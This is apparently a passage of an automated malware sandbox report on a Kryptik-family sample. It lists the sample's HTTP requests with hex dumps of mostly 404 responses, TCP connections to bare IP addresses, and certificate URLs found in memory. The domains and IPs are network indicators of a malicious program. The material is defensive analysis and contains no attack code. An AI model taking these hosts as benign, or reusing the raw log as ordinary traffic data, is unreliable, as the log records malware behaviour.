de de f0 8f e4 91 c6 2a ac 5d 75 c7 51 a5 de 73 79 0c e8 98 c8 7a cf ca 8b 97 bc 84 aa 85 ce 61 cb e5 4a d4 17 49 32 0c c3 54 2b 42 df 23 4a c2 a6 9b 36 76 9d a0 73 d6 c5 bd 58 61 54 7d e7 d3 fb 70 0a bf b0 86 fb 51 85 45 22 2a 16 f1 8e 89 f1 18 a4 12 72 ab 3c 9b 50 27 08 2e 37 1e d8 a1 e1 d8 2b 85 1e be 99 66 0a 2c 64 50 57 c0 c0 ce 3a eb 89 45 60 d5 d7 bd 30 7b 10 46 4e 40 b0 d4 9b 86 1b 45 27 82 ed d8 4c 9c d5 60 39 ee a9 b3 bc 2c 0d 0e 38 0d 85 71 aa 8b d0 15 42 8f 18 bb d8 3f 2e ed b8 ef d6 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2C3eTmk0>Vc;uG:I8yk;,Y:=<[\}ghW0eZuTdi&G($Ok$F`pk-AIx2o&;cL6n- aHcyKn|j1~m</a-J"-[Sn-4dyKfiAL+-jjKxlhW.O!-Rm_#6d923QyzpGjeh.t%SFxJ!rq~g)D@/6DMblp|]vx)W[FU[
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=Rurz8mBnAn33ZWVqU35q; Domain=.bip39chain.info; HttpOnly; Path=/; Expires=Wed, 27-Dec-2023 09:55:34 GMTcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Tue, 27 Dec 2022 09:55:34 GMTvary: User-Agentx-turbo-charged-by: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeset-cookie: PHPSESSID=c59c892e3774da37d881dcf5d3811775; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-Encoding,User-Agentcontent-type: text/html; charset=UTF-8content-length: 2223content-encoding: gzipdate: Tue, 27 Dec 2022 09:55:50 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 19 5d 6f e3 36 f2 39 05 ee 3f 30 5a a0 7e b8 48 ca 27 76 93 b5 bd 68 dd dd 45 ef 82 ee 5e 92 05 ae e8 f5 81 96 c6 16 13 9a d4 92 94 1d a3 e8 7f ef 0c 29 29 b2 e3 38 c9 5d 16 67 b4 2b 72 38 9c 2f ce 0c 67 98 fe ee 4f 9f 46 57 bf 7e 7e cf 0a 37 93 c3 bf 7d d7 a7 2f 93 5c 4d 07 11 a8 88 95 06 26 e2 76 10 e9 e9 19 a2 b8 f2 2c 4d f5 b4 4c 66 90 2a fb 2a c2 0d 8c f5 0b e0 f9 90 85 1f 01 10 34 03 c7 59 56 70 63 c1 0d a2 ca 4d e2 37 01 b9 59 23 5a 31 7c ad c4 7c 10 fd 3b fe f2 43 3c d2 b3 92 3b 31 96 10 b1 4c 2b 07 0a 37 fe fc 7e 00 f9 14 56 b7 2a 3e 83 41 34 17 b0 28 b5 71 1d ec 85 c8 5d 31 c8 61 2e 32 88 fd 64 8f 09 25 9c e0 32 b6 19 97 30 38 88 86 eb 42 76 05 a9 29 c5 6e 59 76 a5 70 70 eb 52 b2 cb db 56 a5 2f 57 1f 50 23 96 be 98 60 c9 fe 1e ab 2c 18 3f e7 68 85 81 d2 7b 6c c6 6f c5 ac 9a dd 21 11 cb 55 f9 03 d3 1c 6c 66 44 e9 84 56 1d be 57 05 b0 92 4f 81 2d 75 c5 b8 01 26 b5 be 11 6a ca 26 da b0 8c 2b a5 1d 1b 03 ce 2a 95 33 ae 96 8b 02 0c 24 ec b3 04 6e 81 39 b3 64 7c ca 85 62 84 8d 34 79 e6 50 46 bf 79 a6 91 9a 50 13 9d 6c 36 c2 0d 2c 17 da e4 b6 23 4c 07 71 37 8e d9 a7 12 14 fb 68 78 59 b0 2b 3e b5 2c 8e 57 c8 94 46 97 60 dc d2 7b de da 79 2c 60 6c 85 03 22 f8 dd ce 06 f4 ca c8 0e 36 1d b0 45 b7 35 c0 a5 bb 75 49 a6 93 ea e6 c1 bd 4e b8 15 0f fc 4c e6 23 3b 05 23 c5 ec c1 9d ff df 23 40 91 a4 50 37 cc 80 44 3f e6 4a 2b 81 3e 13 b1 02 e3 77 ab 0d d0 99 6a bb 7b d5 87 f7 14 ee a7 61 a1 f6 ba 4e fc d0 31 fe a8 b5 b3 0e 8f 11 c5 43 79 46 97 97 9d 93 f4 12 6d 91 20 b5 0e 43 3e 4b 33 6b d3 71 43 28 99 09 95 20 24 0a ba 58 b7 94 60 0b 00 17 75 dd 87 d2 85 56 68 e2 4d 2c d7 37 32 72 a0 3a 8e 3d e5 6d 32 b9 02 66 60 d3 0c 4f 40 c1 6d ea c9 78 79 5e 8e 45 47 ed ac d1 c3 b6 7a 7f 13 3e 13 1e 73 29 ef f1 20 53 5e 50 f6 33 90 b3 7f f0 39 0f 3e cc 3e 08 64 d8 31 6b 0d ee 30 bf 6e 91 23 66 4d f6 88 08 d7 36 bd fe 5a 81 59 7a 09 ae 51 80 7e 1a 76 bf 14 87 55 ff f9 16 1c 78 59 4a 0c 2a 0a f0 64 72 8f c5 53 98 0c 9b 10 9a 73 c3 90 1c 26 aa 87 62 f3 6d 17 d5 e9 1b 50 83 e8 20 df 3f ca 20 3f 3e ca 8e 8f 8f 8e 4e 4e 4f f6 4f 0e e0 e4 f5 e4 cd fe 9b d3 d3 a3 fc a4 d9 d4 4a d5 46 ea 13 54 4f d3 2c 57 d7 36 c9 a4 ae f2 89 c4 54 85 92 cc 52 7e cd 6f 53 29 c6 e8 a9 85 b6 a0 d2 83 04 af a1 7a 92 ac 9c e9 bb f9 c0 2f 76 cc 82 59 e9 25 58 8b 51 01 d9 0d b2 de 4f 0e 52 91 d1 a4 cb 13 a1 cf e6 d9 58 fd 31 a5 a5 28 c7 9a 9b 1c 79 21 ff 93 e4 e0 a4 03 eb c8 40 2b 2f af 78 46 97 05 60 e2 47 63 bb c3 f4 08 55 3d 5a 05 de c9 e0 17 57 45 78 4e 06 79 29 59 90 e4 9d 30 2f 7a 16 b5 b3 61 19 35 36 02 ab c2 98 57 4e 53 fe 94 e0 00 0f e7 38 39 d8 6f 90 ba 4b ab
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeset-cookie: PHPSESSID=beb728d97ac978daf2fedd2b616d8402; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-Encoding,User-Agentcontent-type: text/html; charset=UTF-8content-length: 7206date: Tue, 27 Dec 2022 09:55:53 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 61 6e 79 77 68 65 72 65 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6f 72 20 63 6f 6e 74 61 63 74 20 75 73 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 2e 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 4f 70 65 6e 20 47 72 61 70 68 20 54 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 6c 74 78 74 2e 63 6f 2e 75 6b 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 70 61 67 65 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 27 Dec 2022 09:55:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 269Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 36 61 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 34 74 78 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /p6a2/ was not found on this server.</p><hr><address>Apache/2.4.6 Server at www.4tx.ru Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 27 Dec 2022 09:56:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 269Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 36 61 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 34 74 78 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /p6a2/ was not found on this server.</p><hr><address>Apache/2.4.6 Server at www.4tx.ru Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:56:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:56:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Dec 2022 09:56:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache: HITData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20
                Source: unknownTCP traffic detected without corresponding DNS query: 104.212.67.92
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.4.50
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.4.50
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.4.50
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.4.50
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
